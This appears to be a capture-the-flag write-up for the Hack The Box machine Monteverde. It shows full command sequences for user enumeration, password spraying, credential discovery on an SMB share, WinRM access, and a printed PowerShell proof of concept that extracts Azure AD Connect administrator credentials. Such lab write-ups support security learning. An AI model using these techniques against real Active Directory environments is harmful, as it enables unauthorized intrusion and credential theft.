> For the complete documentation index, see [llms.txt](https://blind0bandit.gitbook.io/blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-monteverde.md). # HTB - Monteverde ## Machine Info Monteverde is a Medium Windows machine that features Azure AD Connect. The domain is enumerated and a user list is created. Through password spraying, the `SABatchJobs` service account is found to have the username as a password. Using this service account, it is possible to enumerate SMB Shares on the system, and the `$users` share is found to be world-readable. An XML file used for an Azure AD account is found within a user folder and contains a password. Due to password reuse, we can connect to the domain controller as `mhope` using WinRM. Enumeration shows that `Azure AD Connect` is installed. It is possible to extract the credentials for the account that replicates the directory changes to Azure (in this case the default domain administrator). ## Enumeration *** **Scope** > IP Address: 10.10.10.172 **Nmap Scan** ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade] └─$ nmap -p- --min-rate 10000 $ip -Pn PORT STATE SERVICE REASON 53/tcp open domain syn-ack 88/tcp open kerberos-sec syn-ack 135/tcp open msrpc syn-ack 139/tcp open netbios-ssn syn-ack 389/tcp open ldap syn-ack 445/tcp open microsoft-ds syn-ack 464/tcp open kpasswd5 syn-ack 636/tcp open ldapssl syn-ack 3269/tcp open globalcatLDAPssl syn-ack 5985/tcp open wsman syn-ack ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade] └─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000 PORT STATE SERVICE 53/udp open domain 88/udp open kerberos-sec 123/udp open ntp 389/udp open ldap ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade] └─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-10 14:21:34Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 636/tcp open tcpwrapped 3269/tcp open tcpwrapped Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2024-07-10T14:21:46 |_ start_date: N/A |_clock-skew: 5s ``` ``` * Open ports: 53,88,135,139,389,445,464,636,3269 * UDP Open ports: 53,88,123,389 * Services: DNS - KERBEROS - RPC - SMB - LDAP - NTP - winRM * Important Notes: Domain: MEGABANK.LOCAL ``` **DNS Enumeration** No zone transfer ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ dig axfr MEGABANK.LOCAL @$ip ; <<>> DiG 9.19.19-1-Debian <<>> axfr MEGABANK.LOCAL @10.10.10.172 ;; global options: +cmd ; Transfer failed. ``` **RPC Enumeration** Got a list of usernames from `rpcclient`, then filter and add the output to a list ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ rpcclient -U "%" $ip rpcclient $> enumdomusers user:[Guest] rid:[0x1f5] user:[AAD_987d7f2f57d2] rid:[0x450] user:[mhope] rid:[0x641] user:[SABatchJobs] rid:[0xa2a] user:[svc-ata] rid:[0xa2b] user:[svc-bexec] rid:[0xa2c] user:[svc-netapp] rid:[0xa2d] user:[dgalanos] rid:[0xa35] user:[roleary] rid:[0xa36] user:[smorgan] rid:[0xa37] ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ cat users.test | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst Guest AAD_987d7f2f57d2 SABatchJobs svc-ata svc-bexec svc-netapp mhope dgalanos roleary smorgan ``` **SMB Enumeration** No thing found after trying enumerating smb ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ crackmapexec smb $ip -u '' -p '' --shares SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\: SMB 10.10.10.172 445 MONTEVERDE [-] Error enumerating shares: STATUS_ACCESS_DENIED ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ smbclient -N -L //$ip Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` **KERBEROS Enumeration** I attempted `ASREP-Roasting` attack but failed ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set ``` ## Initial Access *** After I run all options I know, I tried password spraying with the name usernames as passwords ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ crackmapexec smb $ip -u users.lst -p users.lst --no-bruteforce --continue-on-success SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs ``` List the shares on the box and permissions we have on each one with `crackmapexec` and list the content of available share with `spider_plus` module ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ crackmapexec smb $ip -u SABatchJobs -p SABatchJobs --shares SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs SMB 10.10.10.172 445 MONTEVERDE [+] Enumerated shares SMB 10.10.10.172 445 MONTEVERDE Share Permissions Remark SMB 10.10.10.172 445 MONTEVERDE ----- ----------- ------ SMB 10.10.10.172 445 MONTEVERDE ADMIN$ Remote Admin SMB 10.10.10.172 445 MONTEVERDE azure_uploads READ SMB 10.10.10.172 445 MONTEVERDE C$ Default share SMB 10.10.10.172 445 MONTEVERDE E$ Default share SMB 10.10.10.172 445 MONTEVERDE IPC$ READ Remote IPC SMB 10.10.10.172 445 MONTEVERDE NETLOGON READ Logon server share SMB 10.10.10.172 445 MONTEVERDE SYSVOL READ Logon server share SMB 10.10.10.172 445 MONTEVERDE users$ READ ``` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ crackmapexec smb $ip -u SABatchJobs -p SABatchJobs --shares -M splider_plus ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ cat /tmp/cme_spider_plus/10.10.10.172.json "azure_uploads": {}, "users$": { "mhope/azure.xml": { "atime_epoch": "2020-01-03 08:41:18", "ctime_epoch": "2020-01-03 08:39:53", "mtime_epoch": "2020-01-03 09:59:24", "size": "1.18 KB" ``` Download that Interesting file ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ smbclient -U SABatchJobs \\\\$ip\\users$ Password for [WORKGROUP\SABatchJobs]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Jan 3 08:12:48 2020 .. D 0 Fri Jan 3 08:12:48 2020 dgalanos D 0 Fri Jan 3 08:12:30 2020 mhope D 0 Fri Jan 3 08:41:18 2020 roleary D 0 Fri Jan 3 08:10:30 2020 smorgan D 0 Fri Jan 3 08:10:24 2020 31999 blocks of size 4096. 28979 blocks available smb: \> cd mhope smb: \mhope\> ls . D 0 Fri Jan 3 08:41:18 2020 .. D 0 Fri Jan 3 08:41:18 2020 azure.xml AR 1212 Fri Jan 3 08:40:23 2020 31999 blocks of size 4096. 28979 blocks available smb: \mhope\> get azure.xml getting file \mhope\azure.xml of size 1212 as azure.xml (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec) ``` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ cat azure.xml Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential System.Object Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential
2020-01-03T05:35:00.7562298-08:00
2054-01-03T05:35:00.7562298-08:00
00000000-0000-0000-0000-000000000000 4n0therD4y@n0th3r$ ``` I found a password `4n0therD4y@n0th3r$` and I give it a try of the usernames list I have ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ crackmapexec smb $ip -u users.lst -p '4n0therD4y@n0th3r$' --continue-on-success SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ ``` We got a valid credential, Let's see if we have remote access to the box ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ crackmapexec winrm $ip -u mhope -p '4n0therD4y@n0th3r$' WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!) ``` Yes. we have :) ```Powershell *Evil-WinRM* PS C:\Users\mhope> type Desktop\user.txt 91d393fd513501e700cxxxxxxxxxxxxx ``` > User Flag: 91d393fd513501e700cxxxxxxxxxxxxx *** ## Privilege Escalation Useful Post: [Azure AD Connect for Red Teamers - XPN InfoSec Blog (xpnsec.com)](https://blog.xpnsec.com/azuread-connect-for-redteam/) {% embed url="" %} * Modify the connection string line with the following argument: * `Server=127.0.0.1` * `Database=DCSync` * `Integrated Security=True` ```powershell ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ nano azure_decrypt_password.ps1 Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n" $client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;DataBase=ADSync;Integrated Security=True" $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() ``` ``` *Evil-WinRM* PS C:\Users\mhope\Documents> .\azure_decrypt_password.ps1 AD Connect Sync Credential Extract POC (@_xpn_) Domain: MEGABANK.LOCAL Username: administrator Password: d0m@in4dmxxxxxxxxxx ``` ```powershell ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde] └─$ evil-winrm -i $ip -u 'administrator' -p 'd0m@in4dmxxxxxxxxx' *Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt bb3e0436d4588c2baxxxxxxxxxxxxx ``` > Root Flag: bb3e0436d4588c2baxxxxxxxxxxxxx --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-monteverde.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.